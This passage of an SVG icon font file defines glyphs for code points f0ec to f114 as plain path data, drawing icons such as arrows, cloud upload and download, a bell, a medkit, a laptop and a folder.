<glyph unicode="&#xf0ec;" horiz-adv-x="1792" d="M1792 352v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-1376v-192q0 -13 -9.5 -22.5t-22.5 -9.5q-12 0 -24 10l-319 320q-9 9 -9 22q0 14 9 23l320 320q9 9 23 9q13 0 22.5 -9.5t9.5 -22.5v-192h1376q13 0 22.5 -9.5t9.5 -22.5zM1792 896q0 -14 -9 -23l-320 -320q-9 -9 -23 -9 q-13 0 -22.5 9.5t-9.5 22.5v192h-1376q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h1376v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23z" />
<glyph unicode="&#xf0ed;" horiz-adv-x="1920" d="M1280 608q0 14 -9 23t-23 9h-224v352q0 13 -9.5 22.5t-22.5 9.5h-192q-13 0 -22.5 -9.5t-9.5 -22.5v-352h-224q-13 0 -22.5 -9.5t-9.5 -22.5q0 -14 9 -23l352 -352q9 -9 23 -9t23 9l351 351q10 12 10 24zM1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088 q-185 0 -316.5 131.5t-131.5 316.5q0 130 70 240t188 165q-2 30 -2 43q0 212 150 362t362 150q156 0 285.5 -87t188.5 -231q71 62 166 62q106 0 181 -75t75 -181q0 -76 -41 -138q130 -31 213.5 -135.5t83.5 -238.5z" />
<glyph unicode="&#xf0ee;" horiz-adv-x="1920" d="M1280 672q0 14 -9 23l-352 352q-9 9 -23 9t-23 -9l-351 -351q-10 -12 -10 -24q0 -14 9 -23t23 -9h224v-352q0 -13 9.5 -22.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 22.5v352h224q13 0 22.5 9.5t9.5 22.5zM1920 384q0 -159 -112.5 -271.5t-271.5 -112.5h-1088 q-185 0 -316.5 131.5t-131.5 316.5q0 130 70 240t188 165q-2 30 -2 43q0 212 150 362t362 150q156 0 285.5 -87t188.5 -231q71 62 166 62q106 0 181 -75t75 -181q0 -76 -41 -138q130 -31 213.5 -135.5t83.5 -238.5z" />
<glyph unicode="&#xf0f0;" horiz-adv-x="1408" d="M384 192q0 -26 -19 -45t-45 -19t-45 19t-19 45t19 45t45 19t45 -19t19 -45zM1408 131q0 -121 -73 -190t-194 -69h-874q-121 0 -194 69t-73 190q0 68 5.5 131t24 138t47.5 132.5t81 103t120 60.5q-22 -52 -22 -120v-203q-58 -20 -93 -70t-35 -111q0 -80 56 -136t136 -56 t136 56t56 136q0 61 -35.5 111t-92.5 70v203q0 62 25 93q132 -104 295 -104t295 104q25 -31 25 -93v-64q-106 0 -181 -75t-75 -181v-89q-32 -29 -32 -71q0 -40 28 -68t68 -28t68 28t28 68q0 42 -32 71v89q0 52 38 90t90 38t90 -38t38 -90v-89q-32 -29 -32 -71q0 -40 28 -68 t68 -28t68 28t28 68q0 42 -32 71v89q0 68 -34.5 127.5t-93.5 93.5q0 10 0.5 42.5t0 48t-2.5 41.5t-7 47t-13 40q68 -15 120 -60.5t81 -103t47.5 -132.5t24 -138t5.5 -131zM1088 1024q0 -159 -112.5 -271.5t-271.5 -112.5t-271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5 t271.5 -112.5t112.5 -271.5z" />
<glyph unicode="&#xf0f1;" horiz-adv-x="1408" d="M1280 832q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 832q0 -62 -35.5 -111t-92.5 -70v-395q0 -159 -131.5 -271.5t-316.5 -112.5t-316.5 112.5t-131.5 271.5v132q-164 20 -274 128t-110 252v512q0 26 19 45t45 19q6 0 16 -2q17 30 47 48 t65 18q53 0 90.5 -37.5t37.5 -90.5t-37.5 -90.5t-90.5 -37.5q-33 0 -64 18v-402q0 -106 94 -181t226 -75t226 75t94 181v402q-31 -18 -64 -18q-53 0 -90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5q35 0 65 -18t47 -48q10 2 16 2q26 0 45 -19t19 -45v-512q0 -144 -110 -252 t-274 -128v-132q0 -106 94 -181t226 -75t226 75t94 181v395q-57 21 -92.5 70t-35.5 111q0 80 56 136t136 56t136 -56t56 -136z" />
<glyph unicode="&#xf0f2;" horiz-adv-x="1792" d="M640 1152h512v128h-512v-128zM288 1152v-1280h-64q-92 0 -158 66t-66 158v832q0 92 66 158t158 66h64zM1408 1152v-1280h-1024v1280h128v160q0 40 28 68t68 28h576q40 0 68 -28t28 -68v-160h128zM1792 928v-832q0 -92 -66 -158t-158 -66h-64v1280h64q92 0 158 -66 t66 -158z" />
<glyph unicode="&#xf0f3;" horiz-adv-x="1792" d="M912 -160q0 16 -16 16q-59 0 -101.5 42.5t-42.5 101.5q0 16 -16 16t-16 -16q0 -73 51.5 -124.5t124.5 -51.5q16 0 16 16zM1728 128q0 -52 -38 -90t-90 -38h-448q0 -106 -75 -181t-181 -75t-181 75t-75 181h-448q-52 0 -90 38t-38 90q50 42 91 88t85 119.5t74.5 158.5 t50 206t19.5 260q0 152 117 282.5t307 158.5q-8 19 -8 39q0 40 28 68t68 28t68 -28t28 -68q0 -20 -8 -39q190 -28 307 -158.5t117 -282.5q0 -139 19.5 -260t50 -206t74.5 -158.5t85 -119.5t91 -88z" />
<glyph unicode="&#xf0f4;" horiz-adv-x="1920" d="M1664 896q0 80 -56 136t-136 56h-64v-384h64q80 0 136 56t56 136zM0 128h1792q0 -106 -75 -181t-181 -75h-1280q-106 0 -181 75t-75 181zM1856 896q0 -159 -112.5 -271.5t-271.5 -112.5h-64v-32q0 -92 -66 -158t-158 -66h-704q-92 0 -158 66t-66 158v736q0 26 19 45 t45 19h1152q159 0 271.5 -112.5t112.5 -271.5z" />
<glyph unicode="&#xf0f5;" horiz-adv-x="1408" d="M640 1472v-640q0 -61 -35.5 -111t-92.5 -70v-779q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v779q-57 20 -92.5 70t-35.5 111v640q0 26 19 45t45 19t45 -19t19 -45v-416q0 -26 19 -45t45 -19t45 19t19 45v416q0 26 19 45t45 19t45 -19t19 -45v-416q0 -26 19 -45 t45 -19t45 19t19 45v416q0 26 19 45t45 19t45 -19t19 -45zM1408 1472v-1600q0 -52 -38 -90t-90 -38h-128q-52 0 -90 38t-38 90v512h-224q-13 0 -22.5 9.5t-9.5 22.5v800q0 132 94 226t226 94h256q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0f6;" d="M1468 1156q28 -28 48 -76t20 -88v-1152q0 -40 -28 -68t-68 -28h-1344q-40 0 -68 28t-28 68v1600q0 40 28 68t68 28h896q40 0 88 -20t76 -48zM1024 1400v-376h376q-10 29 -22 41l-313 313q-12 12 -41 22zM1408 -128v1024h-416q-40 0 -68 28t-28 68v416h-768v-1536h1280z M384 736q0 14 9 23t23 9h704q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704q-14 0 -23 9t-9 23v64zM1120 512q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h704zM1120 256q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704 q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h704z" />
<glyph unicode="&#xf0f7;" horiz-adv-x="1408" d="M384 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M1152 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M1152 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M1152 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 992v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M896 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 1248v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M896 -128h384v1536h-1152v-1536h384v224q0 13 9.5 22.5t22.5 9.5h320q13 0 22.5 -9.5t9.5 -22.5v-224zM1408 1472v-1664q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v1664q0 26 19 45t45 19h1280q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0f8;" horiz-adv-x="1408" d="M384 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM384 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M1152 224v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM896 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M640 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 480v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M896 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5zM1152 736v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-64q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h64q13 0 22.5 -9.5t9.5 -22.5z M896 -128h384v1152h-256v-32q0 -40 -28 -68t-68 -28h-448q-40 0 -68 28t-28 68v32h-256v-1152h384v224q0 13 9.5 22.5t22.5 9.5h320q13 0 22.5 -9.5t9.5 -22.5v-224zM896 1056v320q0 13 -9.5 22.5t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-96h-128v96q0 13 -9.5 22.5 t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-320q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5v96h128v-96q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1408 1088v-1280q0 -26 -19 -45t-45 -19h-1280q-26 0 -45 19t-19 45v1280q0 26 19 45t45 19h320 v288q0 40 28 68t68 28h448q40 0 68 -28t28 -68v-288h320q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0f9;" horiz-adv-x="1920" d="M640 128q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM256 640h384v256h-158q-14 -2 -22 -9l-195 -195q-7 -12 -9 -22v-30zM1536 128q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5 t90.5 37.5t37.5 90.5zM1664 800v192q0 14 -9 23t-23 9h-224v224q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-224h-224q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h224v-224q0 -14 9 -23t23 -9h192q14 0 23 9t9 23v224h224q14 0 23 9t9 23zM1920 1344v-1152 q0 -26 -19 -45t-45 -19h-192q0 -106 -75 -181t-181 -75t-181 75t-75 181h-384q0 -106 -75 -181t-181 -75t-181 75t-75 181h-128q-26 0 -45 19t-19 45t19 45t45 19v416q0 26 13 58t32 51l198 198q19 19 51 32t58 13h160v320q0 26 19 45t45 19h1152q26 0 45 -19t19 -45z" />
<glyph unicode="&#xf0fa;" horiz-adv-x="1792" d="M1280 416v192q0 14 -9 23t-23 9h-224v224q0 14 -9 23t-23 9h-192q-14 0 -23 -9t-9 -23v-224h-224q-14 0 -23 -9t-9 -23v-192q0 -14 9 -23t23 -9h224v-224q0 -14 9 -23t23 -9h192q14 0 23 9t9 23v224h224q14 0 23 9t9 23zM640 1152h512v128h-512v-128zM256 1152v-1280h-32 q-92 0 -158 66t-66 158v832q0 92 66 158t158 66h32zM1440 1152v-1280h-1088v1280h160v160q0 40 28 68t68 28h576q40 0 68 -28t28 -68v-160h160zM1792 928v-832q0 -92 -66 -158t-158 -66h-32v1280h32q92 0 158 -66t66 -158z" />
<glyph unicode="&#xf0fb;" horiz-adv-x="1920" d="M1920 576q-1 -32 -288 -96l-352 -32l-224 -64h-64l-293 -352h69q26 0 45 -4.5t19 -11.5t-19 -11.5t-45 -4.5h-96h-160h-64v32h64v416h-160l-192 -224h-96l-32 32v192h32v32h128v8l-192 24v128l192 24v8h-128v32h-32v192l32 32h96l192 -224h160v416h-64v32h64h160h96 q26 0 45 -4.5t19 -11.5t-19 -11.5t-45 -4.5h-69l293 -352h64l224 -64l352 -32q261 -58 287 -93z" />
<glyph unicode="&#xf0fc;" horiz-adv-x="1664" d="M640 640v384h-256v-256q0 -53 37.5 -90.5t90.5 -37.5h128zM1664 192v-192h-1152v192l128 192h-128q-159 0 -271.5 112.5t-112.5 271.5v320l-64 64l32 128h480l32 128h960l32 -192l-64 -32v-800z" />
<glyph unicode="&#xf0fd;" d="M1280 192v896q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-320h-512v320q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-896q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v320h512v-320q0 -26 19 -45t45 -19h128q26 0 45 19t19 45zM1536 1120v-960 q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf0fe;" d="M1280 576v128q0 26 -19 45t-45 19h-320v320q0 26 -19 45t-45 19h-128q-26 0 -45 -19t-19 -45v-320h-320q-26 0 -45 -19t-19 -45v-128q0 -26 19 -45t45 -19h320v-320q0 -26 19 -45t45 -19h128q26 0 45 19t19 45v320h320q26 0 45 19t19 45zM1536 1120v-960 q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf100;" horiz-adv-x="1024" d="M627 160q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23zM1011 160q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23 t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23t-10 -23l-393 -393l393 -393q10 -10 10 -23z" />
<glyph unicode="&#xf101;" horiz-adv-x="1024" d="M595 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23zM979 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23 l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
<glyph unicode="&#xf102;" horiz-adv-x="1152" d="M1075 224q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23zM1075 608q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393 q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
<glyph unicode="&#xf103;" horiz-adv-x="1152" d="M1075 672q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23zM1075 1056q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23 t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
<glyph unicode="&#xf104;" horiz-adv-x="640" d="M627 992q0 -13 -10 -23l-393 -393l393 -393q10 -10 10 -23t-10 -23l-50 -50q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
<glyph unicode="&#xf105;" horiz-adv-x="640" d="M595 576q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l393 393l-393 393q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
<glyph unicode="&#xf106;" horiz-adv-x="1152" d="M1075 352q0 -13 -10 -23l-50 -50q-10 -10 -23 -10t-23 10l-393 393l-393 -393q-10 -10 -23 -10t-23 10l-50 50q-10 10 -10 23t10 23l466 466q10 10 23 10t23 -10l466 -466q10 -10 10 -23z" />
<glyph unicode="&#xf107;" horiz-adv-x="1152" d="M1075 800q0 -13 -10 -23l-466 -466q-10 -10 -23 -10t-23 10l-466 466q-10 10 -10 23t10 23l50 50q10 10 23 10t23 -10l393 -393l393 393q10 10 23 10t23 -10l50 -50q10 -10 10 -23z" />
<glyph unicode="&#xf108;" horiz-adv-x="1920" d="M1792 544v832q0 13 -9.5 22.5t-22.5 9.5h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-832q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5zM1920 1376v-1088q0 -66 -47 -113t-113 -47h-544q0 -37 16 -77.5t32 -71t16 -43.5q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19 t-19 45q0 14 16 44t32 70t16 78h-544q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf109;" horiz-adv-x="1920" d="M416 256q-66 0 -113 47t-47 113v704q0 66 47 113t113 47h1088q66 0 113 -47t47 -113v-704q0 -66 -47 -113t-113 -47h-1088zM384 1120v-704q0 -13 9.5 -22.5t22.5 -9.5h1088q13 0 22.5 9.5t9.5 22.5v704q0 13 -9.5 22.5t-22.5 9.5h-1088q-13 0 -22.5 -9.5t-9.5 -22.5z M1760 192h160v-96q0 -40 -47 -68t-113 -28h-1600q-66 0 -113 28t-47 68v96h160h1600zM1040 96q16 0 16 16t-16 16h-160q-16 0 -16 -16t16 -16h160z" />
<glyph unicode="&#xf10a;" horiz-adv-x="1152" d="M640 128q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1024 288v960q0 13 -9.5 22.5t-22.5 9.5h-832q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h832q13 0 22.5 9.5t9.5 22.5zM1152 1248v-1088q0 -66 -47 -113t-113 -47h-832 q-66 0 -113 47t-47 113v1088q0 66 47 113t113 47h832q66 0 113 -47t47 -113z" />
<glyph unicode="&#xf10b;" horiz-adv-x="768" d="M464 128q0 33 -23.5 56.5t-56.5 23.5t-56.5 -23.5t-23.5 -56.5t23.5 -56.5t56.5 -23.5t56.5 23.5t23.5 56.5zM672 288v704q0 13 -9.5 22.5t-22.5 9.5h-512q-13 0 -22.5 -9.5t-9.5 -22.5v-704q0 -13 9.5 -22.5t22.5 -9.5h512q13 0 22.5 9.5t9.5 22.5zM480 1136 q0 16 -16 16h-160q-16 0 -16 -16t16 -16h160q16 0 16 16zM768 1152v-1024q0 -52 -38 -90t-90 -38h-512q-52 0 -90 38t-38 90v1024q0 52 38 90t90 38h512q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf10c;" d="M768 1184q-148 0 -273 -73t-198 -198t-73 -273t73 -273t198 -198t273 -73t273 73t198 198t73 273t-73 273t-198 198t-273 73zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103 t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf10d;" horiz-adv-x="1664" d="M768 576v-384q0 -80 -56 -136t-136 -56h-384q-80 0 -136 56t-56 136v704q0 104 40.5 198.5t109.5 163.5t163.5 109.5t198.5 40.5h64q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-64q-106 0 -181 -75t-75 -181v-32q0 -40 28 -68t68 -28h224q80 0 136 -56t56 -136z M1664 576v-384q0 -80 -56 -136t-136 -56h-384q-80 0 -136 56t-56 136v704q0 104 40.5 198.5t109.5 163.5t163.5 109.5t198.5 40.5h64q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-64q-106 0 -181 -75t-75 -181v-32q0 -40 28 -68t68 -28h224q80 0 136 -56t56 -136z" />
<glyph unicode="&#xf10e;" horiz-adv-x="1664" d="M768 1216v-704q0 -104 -40.5 -198.5t-109.5 -163.5t-163.5 -109.5t-198.5 -40.5h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64q106 0 181 75t75 181v32q0 40 -28 68t-68 28h-224q-80 0 -136 56t-56 136v384q0 80 56 136t136 56h384q80 0 136 -56t56 -136zM1664 1216 v-704q0 -104 -40.5 -198.5t-109.5 -163.5t-163.5 -109.5t-198.5 -40.5h-64q-26 0 -45 19t-19 45v128q0 26 19 45t45 19h64q106 0 181 75t75 181v32q0 40 -28 68t-68 28h-224q-80 0 -136 56t-56 136v384q0 80 56 136t136 56h384q80 0 136 -56t56 -136z" />
<glyph unicode="&#xf110;" horiz-adv-x="1792" d="M526 142q0 -53 -37.5 -90.5t-90.5 -37.5q-52 0 -90 38t-38 90q0 53 37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1024 -64q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM320 640q0 -53 -37.5 -90.5t-90.5 -37.5 t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1522 142q0 -52 -38 -90t-90 -38q-53 0 -90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM558 1138q0 -66 -47 -113t-113 -47t-113 47t-47 113t47 113t113 47t113 -47t47 -113z M1728 640q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1088 1344q0 -80 -56 -136t-136 -56t-136 56t-56 136t56 136t136 56t136 -56t56 -136zM1618 1138q0 -93 -66 -158.5t-158 -65.5q-93 0 -158.5 65.5t-65.5 158.5 q0 92 65.5 158t158.5 66q92 0 158 -66t66 -158z" />
<glyph unicode="&#xf111;" d="M1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf112;" horiz-adv-x="1792" d="M1792 416q0 -166 -127 -451q-3 -7 -10.5 -24t-13.5 -30t-13 -22q-12 -17 -28 -17q-15 0 -23.5 10t-8.5 25q0 9 2.5 26.5t2.5 23.5q5 68 5 123q0 101 -17.5 181t-48.5 138.5t-80 101t-105.5 69.5t-133 42.5t-154 21.5t-175.5 6h-224v-256q0 -26 -19 -45t-45 -19t-45 19 l-512 512q-19 19 -19 45t19 45l512 512q19 19 45 19t45 -19t19 -45v-256h224q713 0 875 -403q53 -134 53 -333z" />
<glyph unicode="&#xf113;" horiz-adv-x="1664" d="M640 320q0 -40 -12.5 -82t-43 -76t-72.5 -34t-72.5 34t-43 76t-12.5 82t12.5 82t43 76t72.5 34t72.5 -34t43 -76t12.5 -82zM1280 320q0 -40 -12.5 -82t-43 -76t-72.5 -34t-72.5 34t-43 76t-12.5 82t12.5 82t43 76t72.5 34t72.5 -34t43 -76t12.5 -82zM1440 320 q0 120 -69 204t-187 84q-41 0 -195 -21q-71 -11 -157 -11t-157 11q-152 21 -195 21q-118 0 -187 -84t-69 -204q0 -88 32 -153.5t81 -103t122 -60t140 -29.5t149 -7h168q82 0 149 7t140 29.5t122 60t81 103t32 153.5zM1664 496q0 -207 -61 -331q-38 -77 -105.5 -133t-141 -86 t-170 -47.5t-171.5 -22t-167 -4.5q-78 0 -142 3t-147.5 12.5t-152.5 30t-137 51.5t-121 81t-86 115q-62 123 -62 331q0 237 136 396q-27 82 -27 170q0 116 51 218q108 0 190 -39.5t189 -123.5q147 35 309 35q148 0 280 -32q105 82 187 121t189 39q51 -102 51 -218 q0 -87 -27 -168q136 -160 136 -398z" />
<glyph unicode="&#xf114;" horiz-adv-x="1664" d="M1536 224v704q0 40 -28 68t-68 28h-704q-40 0 -68 28t-28 68v64q0 40 -28 68t-68 28h-320q-40 0 -68 -28t-28 -68v-960q0 -40 28 -68t68 -28h1216q40 0 68 28t28 68zM1664 928v-704q0 -92 -66 -158t-158 -66h-1216q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320 q92 0 158 -66t66 -158v-32h672q92 0 158 -66t66 -158z" />
